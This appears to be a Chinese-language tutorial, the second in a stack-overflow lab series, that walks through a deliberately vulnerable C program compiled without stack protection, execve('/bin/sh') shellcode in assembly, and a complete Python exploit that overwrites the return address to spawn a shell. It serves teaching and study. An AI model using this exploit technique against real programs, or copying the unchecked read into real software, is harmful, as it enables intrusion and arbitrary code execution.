簡介 :

棧溢出是由于C語言系列沒有內置檢查機制來確保復制到緩沖區的數據不得大于緩沖區的大小，因此當這個數據足夠大的時候，將會溢出緩沖區的范圍。當溢出緩沖區之后 , 如果繼續寫入數據就有可能將內存中的重要數據覆蓋 , 對程序甚至系統造成嚴重的影響 。駭客也會利用棧溢出來進行權限的提升等等非法操作 , 駭客可以通過編寫 shellcode 并改變程序流程執行自己編寫的 shellcode 從而達到任意代碼執行的目的

環境 :

1. ubuntu 14.10 32位
2. gcc 4.85

視頻演示 :

棧溢出實驗(二) (在線觀看)
棧溢出實驗(二)[代碼] (下載)

代碼 :

hello.c

#include <stdio.h>
#include <unistd.h>

// 可以看到 , 相比于實驗一 , 這次我們的代碼少了 bingo 函數
// 但是我們最后達到的效果還是得到 宿主機 的 shell
// 那么我們應該怎么做呢 , 這里需要用到一種機制 : 棧內存代碼執行漏洞
// 我們先來分析一下代碼
int main(){
    char buffer[0x50] = {0}; // 定義一個 0x50 = 80 個字節的字符數組 , 并全部初始化為 0 
    /*
     * 這次的程序和上次實驗室相比 : 
     *      1. 缺少了 bingo 函數
     *      2. 定義的 buffer 數組長度變大
     *      3. 使用 printf 函數將 buffer 數組的首地址打印出來了
     *  這三個條件就是這次我們能溢出成功的保證
     *  這次我們的思路是這樣的
     *  既然這次程序并沒有給我們給出一個可以執行 /bin/sh 的 bingo 函數
     *  那么我們就需要自己用匯編語言編寫一個調用 /bin/sh 的程序 , 將這個程序匯編以后得到的機器碼(注意必須得是相同平臺 , 否則機器碼不會正常執行)通過 read 函數寫入到內存中
     *  然后由于 read 函數并不檢查 buffer 數組的邊界
     *  因此我們還是可以溢出來覆蓋掉 main 函數的返回地址
     *  因此我們就需要將機器碼先寫入到 buffer 中 , 然后再填充一些無用的字符直到 main 的返回地址處 , 當程序執行到這里的時候 , 為了能讓我們用匯編編譯的機器碼成功執行 , 我們就需要讓匯編機器碼的地址覆蓋 main 的返回地址
     *  這就需要我們獲取 buffer 的首地址 , 計算機器碼的偏移(當然 , 如果匯編機器碼是從 buffer 的第一個字節開始寫入內存的話 , 那么偏移就是 0 , 那么地址就是 buffer 的首地址 , 事實上 , 機器碼要越短小精悍越好 , 因為 buffer 的長度可能并不足以儲存機器碼 , 也就是說 buffer 的地址是非常寶貴的 , 因此最好從 buffer 的首字節開始寫入) , 然后將機器碼的首地址覆蓋到 main 的返回地址 , 然后就可以成功執行 可以運行/bin/sh的機器碼
     *  這樣我們就成功獲取到了目標機器的 shell
     */
    printf("&buffer = %p\n", &buffer); // 打印字符數組在內存(棧段)中的地址
    fflush(stdout); // 刷新緩沖區
    read(0, buffer, 0xFF); // 使用 read 函數將緩沖區中的 0xFF 字節長度的數據讀取到 buffer 數組中 , 以換行符結束
    printf("Content of buffer : %s\n", buffer); // 打印 buffer 的值
    return 0; // 主函數返回
}

Makefile

a.out:hello.c
    gcc -g -fno-stack-protector -z execstack hello.c
clean:
    rm ./a.out

shellcode.asm

push 0BH
pop eax
cdq
push edx
push dword ptr 68732F2FH
push dword ptr 6E69622FH
mov ebx, esp
xor ecx, ecx
int 80H

exploit.py

#!/usr/bin/env python
# encoding:utf-8

from zio import *
import pwn
from binascii import *

shellcode = ""
shellcode += pwn.asm("push 0x0B")
shellcode += pwn.asm("pop eax")
shellcode += pwn.asm("cdq")
shellcode += pwn.asm("push edx")
shellcode += pwn.asm("push dword ptr 0x68732F2F")
shellcode += pwn.asm("push dword ptr 0x6E69622F")
shellcode += pwn.asm("mov ebx, esp")
shellcode += pwn.asm("xor ecx, ecx")
shellcode += pwn.asm("int 0x80")

print b2a_hex(shellcode)
offset = (0xbffff59c - 0xbffff540)
Io = zio("./a.out")
Io.read_until("&buffer = ")
address = int(Io.read_line()[2:-1], 16)
print address
payload = shellcode + "A" * (offset - len(shellcode)) + l32(address)
print b2a_hex(payload)

Io.write(payload)
Io.interact()